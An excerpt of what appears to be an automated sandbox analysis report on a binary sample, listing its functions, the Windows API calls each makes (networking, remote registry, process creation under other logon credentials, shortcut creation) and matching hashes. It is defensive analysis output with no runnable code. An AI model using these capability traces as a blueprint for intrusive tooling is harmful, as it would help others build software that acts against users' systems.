                        • Instruction Fuzzy Hash: 770186F69102087FEB12ABA49D89EF7336CE708301F445496F74AE2041EA74AE854F74
                        Function 003A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(014AFBE0,014AFBE0), ref: 003A097B
                        • EnterCriticalSection.KERNEL32(014AFBC0,00000000), ref: 003A098D
                        • TerminateThread.KERNEL32(014A9F48,000001F6), ref: 003A099B
                        • WaitForSingleObject.KERNEL32(014A9F48,000003E8), ref: 003A09A9
                        • CloseHandle.KERNEL32(014A9F48), ref: 003A09B8
                        • InterlockedExchange.KERNEL32(014AFBE0,000001F6), ref: 003A09C8
                        • LeaveCriticalSection.KERNEL32(014AFBC0), ref: 003A09CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: 6a7db9aaec4c1f98b14ec9bcf86b757a681260d55fb0a13174300eb4b2c360e4
                        • Instruction ID: 4610fb0a3245222a2599ec800cd1d3fa9c1207b3c6b5d5b04b4b2d44b9a5f2fa
                        • Opcode Fuzzy Hash: 6a7db9aaec4c1f98b14ec9bcf86b757a681260d55fb0a13174300eb4b2c360e4
                        • Instruction Fuzzy Hash: D8F01932452A02ABDB465BA4EE8CED6BA39FF02702F402525F206908A0C774A465CF90
                        Function 003B1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                        Download Yara Rule
                        APIs
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003B1DC0
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003B1DE1
                        • WSAGetLastError.WSOCK32 ref: 003B1DF2
                        • htons.WSOCK32(?,?,?,?,?), ref: 003B1EDB
                        • inet_ntoa.WSOCK32(?), ref: 003B1E8C
                          • Part of subcall function 003939E8: _strlen.LIBCMT ref: 003939F2
                          • Part of subcall function 003B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,003AEC0C), ref: 003B3240
                        • _strlen.LIBCMT ref: 003B1F35
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                        • String ID:
                        • API String ID: 3203458085-0
                        • Opcode ID: c42b2141d599afd908ee119f03a7f0b24884f06dfc00cba4716b35f75f67323e
                        • Instruction ID: 4bdc41b2c8877b3b9563afbd283588714896f409225820634a9224f33421af4c
                        • Opcode Fuzzy Hash: c42b2141d599afd908ee119f03a7f0b24884f06dfc00cba4716b35f75f67323e
                        • Instruction Fuzzy Hash: 2EB1D031204300AFC326DF24C895E7A7BE5AF85318F958A4CF6565F6A2CB71ED41CB91
                        Function 003601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                        Download Yara Rule
                        APIs
                        • __allrem.LIBCMT ref: 003600BA
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003600D6
                        • __allrem.LIBCMT ref: 003600ED
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036010B
                        • __allrem.LIBCMT ref: 00360122
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00360140
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                        • Instruction ID: 65b1f48eb61d0aa5cd6c7c63b1f7658b71cfacf1c74ba5b0465c3ef8e8350ceb
                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                        • Instruction Fuzzy Hash: 7B8149766007069FE7269F38CC42B6BB3E8AF41720F25863AF851DB691E770D9048B50
                        Function 003661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003582D9,003582D9,?,?,?,0036644F,00000001,00000001,8BE85006), ref: 00366258
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036644F,00000001,00000001,8BE85006,?,?,?), ref: 003662DE
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003663D8
                        • __freea.LIBCMT ref: 003663E5
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        • __freea.LIBCMT ref: 003663EE
                        • __freea.LIBCMT ref: 00366413
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        • Opcode ID: 8214d981a21ae79543a3d2a7aafdd29badca6bacc941bde5e856a909270c780e
                        • Instruction ID: ef221e313deaedfb21550f715ef4422660298a2be68c2c68106f0310d9e558e6
                        • Opcode Fuzzy Hash: 8214d981a21ae79543a3d2a7aafdd29badca6bacc941bde5e856a909270c780e
                        • Instruction Fuzzy Hash: 0C51D672600216ABDB278F64CC82EBF77A9EF45790F268629FD05DB258DB34DC40C660
                        Function 003BBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBCCA
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBD25
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBD6A
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003BBD99
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003BBDF3
                        • RegCloseKey.ADVAPI32(?), ref: 003BBDFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                        • String ID:
                        • API String ID: 1120388591-0
                        • Opcode ID: 79ec6d4d5c082965cb75ad86770c1e15e48c02986656c1e2393e7a047cc0bade
                        • Instruction ID: fc6f79350383439aa489b4f4e19fb7d627ee3255add851424da7f128fdbba154
                        • Opcode Fuzzy Hash: 79ec6d4d5c082965cb75ad86770c1e15e48c02986656c1e2393e7a047cc0bade
                        • Instruction Fuzzy Hash: 63818C30208241AFD716DF24C891E6ABBE9FF84308F14855CF5998B6A2DF71ED45CB92
                        Function 0038F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(00000035), ref: 0038F7B9
                        • SysAllocString.OLEAUT32(00000001), ref: 0038F860
                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F889
                        • VariantClear.OLEAUT32(0038FA64), ref: 0038F8AD
                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F8B1
                        • VariantClear.OLEAUT32(?), ref: 0038F8BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearCopy$AllocInitString
                        • String ID:
                        • API String ID: 3859894641-0
                        • Opcode ID: 0642dd5697b09c5386cabf476cdb904aa7380c18192004a4ada7a9411380128e
                        • Instruction ID: 73afe11c9b6a47092692a5bfac929a34a898c551e4e4215781a63787432aa4e5
                        • Opcode Fuzzy Hash: 0642dd5697b09c5386cabf476cdb904aa7380c18192004a4ada7a9411380128e
                        • Instruction Fuzzy Hash: 6E51D331610310FFCF26BB65D895B29B3A8EF45310F2494A7E906DF296DB709C40CBA6
                        Function 003A910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 003A94E5
                        • _wcslen.LIBCMT ref: 003A9506
                        • _wcslen.LIBCMT ref: 003A952D
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 003A9585
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$FileName$OpenSave
                        • String ID: X
                        • API String ID: 83654149-3081909835
                        • Opcode ID: 00c098cc727024fd32693e1c1e3610241d3fa3b375f977a9f157f9b82ce5c545
                        • Instruction ID: a41c7d0552c40e9eeedcf4f0e8b70e1f8fc78be0f4fa18fdc296bae8c427ab73
                        • Opcode Fuzzy Hash: 00c098cc727024fd32693e1c1e3610241d3fa3b375f977a9f157f9b82ce5c545
                        • Instruction Fuzzy Hash: 21E181355083409FD726DF24C485B6AB7E4FF86314F05896EF8899B2A2DB31DD05CB92
                        Function 0034920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • BeginPaint.USER32(?,?,?), ref: 00349241
                        • GetWindowRect.USER32(?,?), ref: 003492A5
                        • ScreenToClient.USER32(?,?), ref: 003492C2
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003492D3
                        • EndPaint.USER32(?,?,?,?,?), ref: 00349321
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003871EA
                          • Part of subcall function 00349339: BeginPath.GDI32(00000000), ref: 00349357
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                        • String ID:
                        • API String ID: 3050599898-0
                        • Opcode ID: aaa98197f0122611f0070b7ed177810fef0827fcbdef6a3cb401b48de2bd82c6
                        • Instruction ID: a1008a1da1d2973f626ae633d51c06c7b062c089c6a9d6b6993074defb043f85
                        • Opcode Fuzzy Hash: aaa98197f0122611f0070b7ed177810fef0827fcbdef6a3cb401b48de2bd82c6
                        • Instruction Fuzzy Hash: 30419F70104300AFD722DF25CC89FAB7BE9EB4A320F14066AF994DB2B1C771A845DB61
                        Function 003A07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 003A080C
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003A0847
                        • EnterCriticalSection.KERNEL32(?), ref: 003A0863
                        • LeaveCriticalSection.KERNEL32(?), ref: 003A08DC
                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003A08F3
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A0921
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                        • String ID:
                        • API String ID: 3368777196-0
                        • Opcode ID: f422a04662fe6fead1ca66b200ae6bba8e817f2e3d5633a56afeb678a355644c
                        • Instruction ID: f8a52fc011dcf4564d107c21c18b90b5350d92702f951b1c047642abb960b562
                        • Opcode Fuzzy Hash: f422a04662fe6fead1ca66b200ae6bba8e817f2e3d5633a56afeb678a355644c
                        • Instruction Fuzzy Hash: F2416A71900205EFDF1AAF54DC85AAAB7B8FF05300F1440A9ED04DE2A6D734EE65DBA4
                        Function 003C81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0038F3AB,00000000,?,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 003C824C
                        • EnableWindow.USER32(00000000,00000000), ref: 003C8272
                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003C82D1
                        • ShowWindow.USER32(00000000,00000004), ref: 003C82E5
                        • EnableWindow.USER32(00000000,00000001), ref: 003C830B
                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003C832F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: c29b87169cb2cef1ae14100d2324e8fd691b3270df35eb1b35bf0a4952933788
                        • Instruction ID: 85361f9034726c9eead3bd9465f2abb9acb70f645d4db18a0717f1bea566d4ad
                        • Opcode Fuzzy Hash: c29b87169cb2cef1ae14100d2324e8fd691b3270df35eb1b35bf0a4952933788
                        • Instruction Fuzzy Hash: FA418E78601644AFDB22CF15C999FA47BF0FB0A714F1952ADE508DB2B2CB32AD41CB54
                        Function 00394C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00394C95
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00394CB2
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00394CEA
                        • _wcslen.LIBCMT ref: 00394D08
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00394D10
                        • _wcsstr.LIBVCRUNTIME ref: 00394D1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                        • String ID:
                        • API String ID: 72514467-0
                        • Opcode ID: c2836a10806249483969ebfc07fd699251b03b6262fcad200fb2e3653f3856c2
                        • Instruction ID: 25956ae18263185f4a3cbf26e05e8572cd29faee1c1c2f11c25d25c56409d35b
                        • Opcode Fuzzy Hash: c2836a10806249483969ebfc07fd699251b03b6262fcad200fb2e3653f3856c2
                        • Instruction Fuzzy Hash: 1B21F676604200BFEF175B39AD49E7BBBACDF45750F158029F809CE192EA61DC4297A0
                        Function 003A581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                        • _wcslen.LIBCMT ref: 003A587B
                        • CoInitialize.OLE32(00000000), ref: 003A5995
                        • CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A59AE
                        • CoUninitialize.OLE32 ref: 003A59CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 3172280962-24824748
                        • Opcode ID: 16761ed8ab8b31bf09243bd1ef06638f0d642bfc6690dc3a2a852c1ea42b6911
                        • Instruction ID: d3c0d65fb048b0ee25f710c8d47b7eea940051800bd8d6434b0169704944416c
                        • Opcode Fuzzy Hash: 16761ed8ab8b31bf09243bd1ef06638f0d642bfc6690dc3a2a852c1ea42b6911
                        • Instruction Fuzzy Hash: BDD152756087019FC716DF24C480A2ABBE5FF8A720F15895DF88A9B361DB31EC45CB92
                        Function 0039175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
                          • Part of subcall function 00390FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
                          • Part of subcall function 00390FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
                          • Part of subcall function 00390FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
                          • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
                        • GetLengthSid.ADVAPI32(?,00000000,00391335), ref: 003917AE
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003917BA
                        • HeapAlloc.KERNEL32(00000000), ref: 003917C1
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 003917DA
                        • GetProcessHeap.KERNEL32(00000000,00000000,00391335), ref: 003917EE
                        • HeapFree.KERNEL32(00000000), ref: 003917F5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        • Opcode ID: 286da6f94cdc82ced2c6b8b0fd3a8b725a8a6173d396e4c535e8c5e9f1e4ff82
                        • Instruction ID: 444dcba57190ea6bcf381bbb112bd986a2362c892acf718935e5cf20a67283c6
                        • Opcode Fuzzy Hash: 286da6f94cdc82ced2c6b8b0fd3a8b725a8a6173d396e4c535e8c5e9f1e4ff82
                        • Instruction Fuzzy Hash: EC11A932A20206FFDF229FA5CC49FAE7BADEB41355F144018F486E7220C736A940CB60
                        Function 003914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003914FF
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00391506
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00391515
                        • CloseHandle.KERNEL32(00000004), ref: 00391520
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039154F
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00391563
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: 35feb44f80e7b52634de46ea23375a39a5290d811f14582e2264ac2bb4a3fe3f
                        • Instruction ID: dc2282a5aad6c3d26b2b6630ee3ab2207c12f474cb2805b03877d4f0cf9e2bbe
                        • Opcode Fuzzy Hash: 35feb44f80e7b52634de46ea23375a39a5290d811f14582e2264ac2bb4a3fe3f
                        • Instruction Fuzzy Hash: A111147250024AABDF128FA8ED49FDA7BADFB49744F064025FA09A2060C375DE61DB60
                        Function 00353382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,00353379,00352FE5), ref: 00353390
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035339E
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003533B7
                        • SetLastError.KERNEL32(00000000,?,00353379,00352FE5), ref: 00353409
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
